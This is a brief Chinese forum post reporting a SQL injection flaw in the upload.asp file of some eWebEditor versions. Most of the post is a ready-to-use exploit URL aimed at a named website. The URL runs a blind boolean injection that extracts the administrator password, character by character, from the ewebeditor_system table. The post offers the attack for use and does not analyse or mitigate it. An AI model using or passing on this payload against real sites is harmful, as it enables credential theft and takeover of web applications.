chengker:
某些些版本的ewebeditor编辑器的upload.asp文件存在注入漏洞!
信息错误则返回脚本出错的提示,在浏览器左下角!
具体利用如下:
https://www.netknight.in/ewebeditor/Upload.asp?type=FILEstyle=standard_coolblue1'and%20(select%20top%201%20asc(mid(sys_userpass,15,1))%20from%20ewebeditor_system%20)>98%20and%20'1'='1